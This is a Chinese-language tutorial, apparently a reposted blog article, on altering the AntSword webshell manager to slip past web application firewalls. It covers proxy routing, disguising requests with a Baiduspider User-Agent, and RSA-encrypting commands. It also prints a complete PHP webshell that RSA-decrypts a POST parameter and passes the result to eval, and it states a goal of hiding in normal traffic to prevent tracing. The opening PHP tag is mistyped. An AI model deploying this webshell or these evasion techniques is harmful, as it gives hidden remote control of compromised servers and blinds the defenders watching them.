蚁剑特征性信息修改简单过WAF
0x00 前言
?
針對于蟻劍的特征,對于流量傳輸中WAF檢測的繞過, 打造武器庫, 進行合理化的修改,例如請求頭的偽造,流量的加密等一些常用功能,這邊主要進行 這幾部分的修改。
?
0x01 修改位置
?
-
蟻劍代理通道
-
UA特征偽造
-
RSA流量加密
-
?
0x02 具體操作
1.蟻劍代理通道
?
蟻劍代理通道設置(前提是必須有這個代理):
?
2.UA特征偽造
?
蟻劍默認UA抓包:
主要修改的位置:
/modules/request.js?
這邊主要是推薦百度UA,具體自己可以百度下其他UA,都可以根據需要來進行設置:
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
?
原來的UA:
UA修改后(百度UA爬蟲):
/modules/update.js同樣的方法,將UA頭修改為百度爬蟲:
?
修改前:
修改后UA頭:
通過以上修改后,抓包查看:
3.RSA流量加密
?
蟻劍從2.1開始支持了RSA加密算法,但是僅僅支持php。
在我們隱藏流量中無非就是采用對稱密鑰加密和非對稱密鑰加密。
注意這里YXNzZxJ0 base64解密為assert,eval不可以。
因為eval屬于語言構造器,在php中不能來回調,類似call_user_function()。
?
其中數據請求包中存在eval關鍵字,還是容易被waf檢測到,所以UA頭一定要記得修改。
?
采用RSA加密
?
新建一個rsa編碼器
<?hphp $cmd = @$_POST['ant']; $pk = <<<EOF -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjQSEjYvGaB7q7G5bjKs2b+v34 XZ5/XhHDScxpv88C+fDv6IwxErr0kwcOp+an21tTtRF7Wl4MbEksL6wE3PNPt39k 8i4PBfg51IjBYOmer8AHqr9qyDZq5XgK65yOCWsOIN8+fuP7DtvRxfTFoBNK6O3N eAKyYF0SRzIqPz8CvwIDAQAB -----END PUBLIC KEY----- EOF; $cmds = explode("|", $cmd); $pk = openssl_pkey_get_public($pk); $cmd = ''; foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;} } eval($cmd);0x03 總結
?
細節決定成敗,針對于WAF和內網流量設備的檢測,使用加密流量去混淆在正常流量中,使用代理模式,防止間接性溯源。如果有更好的繞過方式和流量混淆方式,請及時聯系,共同學習進步。
總結
以上是生活随笔為你收集整理的蚁剑特征性信息修改简单过WAF的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 20个非常好用的正则表达式
- 下一篇: sql server 2008安装错误(